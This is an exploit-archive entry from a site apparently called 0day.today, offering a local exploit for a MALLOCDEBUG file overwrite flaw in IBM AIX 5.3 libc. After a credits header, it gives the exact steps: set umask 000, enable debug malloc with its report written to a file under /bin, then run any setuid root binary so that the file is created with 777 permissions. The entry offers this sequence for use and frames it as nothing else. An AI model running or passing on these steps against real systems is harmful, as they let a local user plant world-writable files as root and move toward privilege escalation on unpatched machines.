IBM AIX 5.3 libc MALLOCDEBUG File Overwrite Vulnerability

2009-07-30T00:00:00
ID 1337DAY-ID-8037
Type zdt
Reporter Affix
Modified 2009-07-30T00:00:00

Description

Exploit for aix platform in category local exploits

                                        
                                            =========================================================
IBM AIX 5.3 libc MALLOCDEBUG File Overwrite Vulnerability
=========================================================



#!/bin/bash
##################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability	 #
#[+] Refer : securitytracker.com/id?1022261                      #
#[+] Exploit : Affix                    			 #
#[+] Tested on : IBM AIX					 #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead    #
# AIX 5.3 ML 5 is where this bad libc code was added.		 #
# Libs Affected :						 #
#	/usr/ccs/lib/libc.a					 #
#	/usr/ccs/lib/libp/libc.a				 #
##################################################################

Set the following environment variables:

umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename

echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."



#  0day.today [2018-02-18]  #